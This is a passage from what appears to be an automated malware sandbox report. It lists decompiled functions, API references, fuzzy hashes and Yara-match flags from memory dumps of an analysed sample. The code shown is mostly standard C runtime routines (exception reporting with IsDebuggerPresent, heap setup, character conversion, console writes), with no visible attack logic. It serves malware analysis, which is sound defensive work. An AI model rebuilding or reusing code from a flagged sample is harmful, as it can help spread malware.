                        • Instruction Fuzzy Hash: 370180A140D3C09FD7134B258C84796BFA8DF43234F2980DBE8848F293C2689C49DB71
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020CD01D, Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.524124337.00000000020CD000.00000040.00000001.sdmp, Offset: 020CD000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4bd5512e9072304e50378565d09610b82cc355ded734efeca0858d0b87375fb8
                        • Instruction ID: 3837f947db5689a88807f7832ddf933e5e70a0bd7e4713ee7801181f1efa6a6c
                        • Opcode Fuzzy Hash: 4bd5512e9072304e50378565d09610b82cc355ded734efeca0858d0b87375fb8
                        • Instruction Fuzzy Hash: DC01A7B1408344AAD7115B69CC847ABBBDCEF41678F38C46EFD051B282D379D446DAB2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 0040446F, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                        Download Yara Rule
                        C-Code - Quality: 74%
                        			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x412014; // 0x69238287
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00401E6A(_t41);
					_pop(_t60);
				}
				E00402460(_t65,  &_v804, 0, 0x50);
				E00402460(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00401E6A(_t57);
				}
				E004018CC();
				return _t57;
			}






































                        0x0040446f
                        0x0040446f
                        0x0040446f
                        0x0040447a
                        0x0040447f
                        0x00404481
                        0x00404488
                        0x00404489
                        0x0040448b
                        0x0040448e
                        0x00404493
                        0x00404493
                        0x0040449f
                        0x004044b2
                        0x004044c0
                        0x004044c6
                        0x004044cc
                        0x004044d2
                        0x004044d8
                        0x004044de
                        0x004044e4
                        0x004044ea
                        0x004044f0
                        0x004044f6
                        0x004044fd
                        0x00404504
                        0x0040450b
                        0x00404512
                        0x00404519
                        0x00404520
                        0x00404521
                        0x0040452a
                        0x00404530
                        0x00404533
                        0x00404539
                        0x00404546
                        0x0040454f
                        0x00404558
                        0x00404561
                        0x0040456f
                        0x00404571
                        0x0040457e
                        0x00404586
                        0x00404592
                        0x00404595
                        0x0040459a
                        0x004045a1
                        0x004045a9

                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 00404567
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
                        • Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
                        • Opcode Fuzzy Hash: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
                        • Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004067FE, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004067FE() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4132b0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                        0x004067fe
                        0x00406806
                        0x0040680e

                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                        • Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
                        • Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                        • Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FB3A0, Relevance: .6, Instructions: 596COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 74e75aa31031f2892c17c21fe05184f616676e0490817e0eda26f75800642c96
                        • Instruction ID: eb3ef74f8d792045e48d2498191cf1d6b1eddf9cf09e4654981ed69f4f7dde7d
                        • Opcode Fuzzy Hash: 74e75aa31031f2892c17c21fe05184f616676e0490817e0eda26f75800642c96
                        • Instruction Fuzzy Hash: 60529A74A01228CFDB64DF65C884BDDBBB2BB89304F1085EAD509AB354DB35AE85CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FB9D3, Relevance: .2, Instructions: 193COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3e5b9354096a31eb8707922a5b3de295ceee36857b94ffc45eb8f56a72512fce
                        • Instruction ID: af00eb7e45a88e86c59f64b1c2fb3aeb4bcf762824ee7ddd3cf2055e0a0367dd
                        • Opcode Fuzzy Hash: 3e5b9354096a31eb8707922a5b3de295ceee36857b94ffc45eb8f56a72512fce
                        • Instruction Fuzzy Hash: 47A1AD74A01228DFDB64DF64C854BD9B7B2BB49301F1085EAD90DA7354DB31AE84CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FBBB4, Relevance: .1, Instructions: 116COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1f71ab272c3e9eaee425a46e5268d0dfe1e93a8c6126f9c1dc11bd55f10481c3
                        • Instruction ID: 83610fa30ef73ef00cac17c66d32cacbc8bb18afc7912ef6367b43660a5ff758
                        • Opcode Fuzzy Hash: 1f71ab272c3e9eaee425a46e5268d0dfe1e93a8c6126f9c1dc11bd55f10481c3
                        • Instruction Fuzzy Hash: 19519374A01218DFCB64DF24D854BE9B7B2BB49301F5089EAD90AA7354DB31AE85CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                        Download Yara Rule
                        C-Code - Quality: 70%
                        			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x69238287
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                        0x004078d4
                        0x004078d5
                        0x004078d6
                        0x004078dd
                        0x004078e2
                        0x004078e8
                        0x004078ee
                        0x004078f4
                        0x004078f7
                        0x004078f7
                        0x004078fa
                        0x004078fc
                        0x004078fc
                        0x004078fa
                        0x004078fe
                        0x00407903
                        0x0040790a
                        0x0040790d
                        0x0040790d
                        0x00407929
                        0x0040792f
                        0x00407934
                        0x00407ac7
                        0x00407ad2
                        0x00407ada
                        0x0040793a
                        0x0040793a
                        0x0040793d
                        0x00407942
                        0x00407946
                        0x0040799a
                        0x0040799a
                        0x0040799c
                        0x0040799e
                        0x00407abc
                        0x00407abc
                        0x00407abe
                        0x00407abf
                        0x00407ac5
                        0x00000000
                        0x00407ac5
                        0x004079af
                        0x004079b5
                        0x004079b7
                        0x00000000
                        0x00000000
                        0x004079bd
                        0x004079cf
                        0x004079d4
                        0x004079d8
                        0x00000000
                        0x00000000
                        0x004079e5
                        0x00407a1f
                        0x00407a22
                        0x00407a25
                        0x00407a27
                        0x00407a29
                        0x00407a2b
                        0x00407a77
                        0x00407a77
                        0x00407a79
                        0x00407a79
                        0x00407a7b
                        0x00407ab5
                        0x00407ab6
                        0x00000000
                        0x00407abb
                        0x00407a8f
                        0x00407a94
                        0x00407a96
                        0x00000000
                        0x00000000
                        0x00407a9a
                        0x00407a9b
                        0x00407a9c
                        0x00407a9f
                        0x00407adb
                        0x00407ade
                        0x00407aa1
                        0x00407aa1
                        0x00407aa2
                        0x00407aa2
                        0x00407aaf
                        0x00407ab1
                        0x00407ab3
                        0x00407ae4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407ab3
                        0x00407a2d
                        0x00407a30
                        0x00407a32
                        0x00407a34
                        0x00407a36
                        0x00407a39
                        0x00407a3e
                        0x00407a59
                        0x00407a5b
                        0x00407a65
                        0x00407a67
                        0x00407a68
                        0x00407a6a
                        0x00000000
                        0x00000000
                        0x00407a6c
                        0x00407a72
                        0x00407a72
                        0x00000000
                        0x00407a72
                        0x00407a40
                        0x00407a42
                        0x00407a46
                        0x00407a4b
                        0x00407a4d
                        0x00407a4f
                        0x00000000
                        0x00000000
                        0x00407a51
                        0x00000000
                        0x00407a51
                        0x004079e7
                        0x004079ec
                        0x00000000
                        0x00000000
                        0x004079f2
                        0x004079f4
                        0x00000000
                        0x00000000
                        0x00407a10
                        0x00407a14
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407a1a
                        0x0040794d
                        0x0040794f
                        0x00407951
                        0x00407959
                        0x00407978
                        0x0040797a
                        0x00407984
                        0x00407986
                        0x00407987
                        0x00407989
                        0x00000000
                        0x00000000
                        0x0040798f
                        0x00407995
                        0x00407995
                        0x00000000
                        0x00407995
                        0x0040795d
                        0x00407961
                        0x00407966
                        0x0040796a
                        0x00000000
                        0x00000000
                        0x00407970
                        0x00000000
                        0x00407970

                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                        • __alloca_probe_16.LIBCMT ref: 00407961
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                        • __alloca_probe_16.LIBCMT ref: 00407A46
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                        • __freea.LIBCMT ref: 00407AB6
                          • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                        • __freea.LIBCMT ref: 00407ABF
                        • __freea.LIBCMT ref: 00407AE4
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                        • String ID:
                        • API String ID: 3864826663-0
                        • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                        • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                        • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                        • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x69238287
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                        0x0040822b
                        0x00408232
                        0x00408235
                        0x0040823d
                        0x00408241
                        0x0040824d
                        0x00408250
                        0x00408253
                        0x0040825a
                        0x00408262
                        0x00408265
                        0x0040826b
                        0x00408271
                        0x00408276
                        0x00408278
                        0x0040827b
                        0x00408280
                        0x0040828a
                        0x00408291
                        0x00408294
                        0x0040829b
                        0x004082a2
                        0x004082ce
                        0x004082f4
                        0x004082f6
                        0x00000000
                        0x004082d0
                        0x004082d3
                        0x0040839a
                        0x004083a6
                        0x004083b1
                        0x004083b6
                        0x004082d9
                        0x004082e0
                        0x004082e5
                        0x004082eb
                        0x004082f1
                        0x00000000
                        0x004082f1
                        0x004082eb
                        0x004082d3
                        0x004082a4
                        0x004082a8
                        0x004082ab
                        0x004082b1
                        0x004082b3
                        0x004082b6
                        0x004082ba
                        0x004082f7
                        0x004082fa
                        0x004082fb
                        0x00408300
                        0x00408306
                        0x0040830c
                        0x0040831b
                        0x00408321
                        0x00408327
                        0x0040832c
                        0x00408348
                        0x004083bb
                        0x004083c1
                        0x0040834a
                        0x00408352
                        0x0040835b
                        0x00408361
                        0x00000000
                        0x00408363
                        0x00408365
                        0x00408368
                        0x00408381
                        0x00000000
                        0x00408383
                        0x00408387
                        0x00408389
                        0x0040838c
                        0x00000000
                        0x0040838c
                        0x00408387
                        0x00408381
                        0x00408361
                        0x0040835b
                        0x00408348
                        0x0040832c
                        0x00408306
                        0x00000000
                        0x0040838f
                        0x0040838f
                        0x004083c3
                        0x004083cd
                        0x004083d5

                        APIs
                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                        • __fassign.LIBCMT ref: 004082E0
                        • __fassign.LIBCMT ref: 004082FB
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                        • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                        • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID:
                        • API String ID: 1324828854-0
                        • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                        • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                        • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                        • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 27%
                        			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x69238287
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                        0x00403639
                        0x00403640
                        0x00403643
                        0x00403647
                        0x00403652
                        0x0040365a
                        0x00403665
                        0x0040366b
                        0x0040366f
                        0x00403676
                        0x0040367c
                        0x0040367c
                        0x0040367e
                        0x00403683
                        0x00403688
                        0x00403688
                        0x00403693
                        0x0040369b

                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                        • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                        • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                        • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                        • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                        Download Yara Rule
                        C-Code - Quality: 79%
                        			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x69238287
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                        0x004062c0
                        0x004062c7
                        0x004062ca
                        0x004062d3
                        0x004062d8
                        0x004062dd
                        0x004062e2
                        0x004062e5
                        0x004062e7
                        0x004062e7
                        0x004062ec
                        0x00406305
                        0x0040630b
                        0x00406310
                        0x004063af
                        0x004063b3
                        0x004063b8
                        0x004063b8
                        0x004063cc
                        0x004063d4
                        0x004063d4
                        0x00406316
                        0x00406319
                        0x0040631e
                        0x00406322
                        0x0040636e
                        0x00406370
                        0x00406372
                        0x00406377
                        0x0040638e
